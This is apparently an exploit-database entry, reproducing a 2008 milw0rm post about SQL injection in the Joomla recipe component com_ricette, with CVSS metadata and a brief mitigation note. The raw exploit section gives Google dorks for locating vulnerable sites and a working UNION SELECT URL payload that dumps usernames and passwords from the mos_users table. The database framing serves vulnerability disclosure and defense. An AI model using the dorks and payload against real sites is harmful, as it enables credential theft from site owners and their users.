Joomla SQL Injection (com_ricette)

vendor:

Ricette

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Ricette

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:equal:ricette:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla SQL Injection (com_ricette)

An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

The best way to mitigate SQL injection attacks is to use parameterized queries (also known as prepared statements). This approach ensures that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker.

Source

Exploit-DB raw data:

###############################################################
#
# joomla SQL Injection(com_ricette)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: com_ricette
#
# DORK 2 : allinurl: "com_ricette"id
#
################################################################
EXPLOIT :

index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999/**/union/**/select/**/0,0,%20%20%200x3a,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(username,0x3a,password)/**/from/**/mos_users/*

################################################################
# S@BUN             i AM NOT HACKER                 S@BUN
################################################################

  <name>Ricette</name>
  <creationDate>05-07-2005</creationDate>
  <author>Giorgio Nordo</author>
  <copyright>This component is released under the GNU/GPL License</copyright>
  <authorEmail>giorgio@equal.it</authorEmail>

  <authorUrl>www.equal.it</authorUrl>
  <version>1.0</version>
  <description>Un ricettario illustrato per Mambo realizzato da Giorgio Nordo per www.equal.it e basato sul componente Wines 1.1 di Tommaso Tamantini.</description>

# milw0rm.com [2008-02-16]